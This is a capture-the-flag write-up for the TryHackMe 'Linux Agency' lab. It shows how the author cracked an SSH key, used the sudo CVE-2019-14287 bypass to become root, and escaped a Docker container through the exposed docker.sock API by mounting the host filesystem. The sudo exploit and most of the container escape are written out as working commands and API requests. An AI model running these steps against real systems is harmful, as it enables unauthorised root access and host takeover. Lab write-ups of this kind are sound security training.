TryHackMe: Linux Agency https://tryhackme.com/room/linuxagency

PrivEsc Path way...

The PrivEsc throughout the missions and even the named users was pretty straight forward. I will be skipping this ( let me know if you want any hints ) in this post and will concentrate on the User & Root Flags.

PrivEsc Pointers

Check Out GTFOBins & Python Library HiJacking

User Flag

To get the user flag you need to first use ssh2john and crack the passphrase for robert's ssh key under /home/maya/old_robert_ssh.

Once you have this you need to find the ssh server listening on local host only. Connect to this service as robert using the password you cracked above.

Once you have logged in you notice there is no user.txt, you will need to PrivEsc to get to /root/user.txt which can be done with CVE-2019-14287.

robert@ec96850005d6:~$ sudo -u#-1 /bin/bash
root@ec96850005d6:~# cat /root/user.txt
user{[redacted]}

Root Flag

To get root I had to use some google Fu and ended up at Escaping the Whale: Things you probably shouldn’t do with Docker (Part 1) (archive.org linked) which shows how to abuse the Docker API from inside the container.

socat

A requirement for this exploit is socat but it is not installed in the container so we need to copy it over with ssh, wget or your preferred method and then make it executable with chmod +x socat.

Escape

Firstly we need to get the running container information

root@ec96850005d6:~# curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json
{"Id":"ec96850005d6cf609fadbeaef4a7dbdcad5108f5c319c2f69bc9badf9bc2fbdb","Names":["/kronstadt_industries"],"Image":"mangoman","ImageID":"sha256:b5f279024ce056b3d8da10dfec1d39e39db92900eae68cf941911449e29023f8","Command":"/usr/sbin/sshd -D","Created":1610455843,"Ports":[{"IP":"127.0.0.1","PrivatePort":22,"PublicPort":2222,"Type":"tcp"}],"Labels":{},"State":"running","Status":"Up About an hour","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"bc6fc17c075ad6a5bae0a7a178fb6a0ab5b2820d452f9ab532df008d25cfe69a","EndpointID":"da0e7f20c37a5077ac437f4af97b0b33b5665e25bd4d3ec36f1dabc9418b58b0","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run","Destination":"/var/run","Mode":"","RW":true,"Propagation":"rprivate"}]}]

make a note of the "Image" key pair. We then need to write a container.json for the container we want to make.

echo -e '{"Image":"mangoman","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/mnt/root"}]}' > container.json

Take note of

  • "Image":"mangoman" - this is the image that exists on the host as found above. Most examples will show ubuntu which is not available on the host.
  • "Type":"bind","Source":"/","Target":"/mnt/root" - this is how we are going to get access to the hosts root file system

Now we have that lets create our new container using curl and the docker API.

root@ec96850005d6:~# curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d "$(cat container.json)" http://localhost/containers/create
{"Id":"2353dc60ab495411bb1203ade7a9a94b5428d568179b4b00661d29c932d43e9c","Warnings":[]}

Make a note of the "Id" value as we will need this in the following commands. Now we will start the container using the API.

curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/YOUR-CONTAINER-ID/start

Once started we can then use socat to connect to the API.

root@ec96850005d6:~# ./socat - UNIX-CONNECT:/var/run/docker.sock

Once connected socat will appear to hang but this is the API waiting for input, we need to provide the following to get attached to our container and get stdin and stdout to stream via the API.

POST /containers/YOUR-CONTAINER-ID/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp

Once we paste that in and hit enter a couple of times we should get

HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp

If all went as planned this should result in us having a shell streamed via the API and we should now be able to read the flag. Note: This is a limited shell and interactive commands or paging command (less, more) will likely not work

cd mnt/root/root

ls
    message.txt
    root.txt

cat root.txt
    'root{[redcated]}

cat message.txt
    Nice Job 47
    We are really impressed with your skills

    Hope you enjoyed your journey!!

    Your director's of ICA 
    0z09e & Xyan1d3


    ========>0z09e
    https://github.com/0z09e
    https://twitter.com/0z09e

    ========>Xyan1d3
    https://twitter.com/xyan1d3
    https://github.com/xyan1d3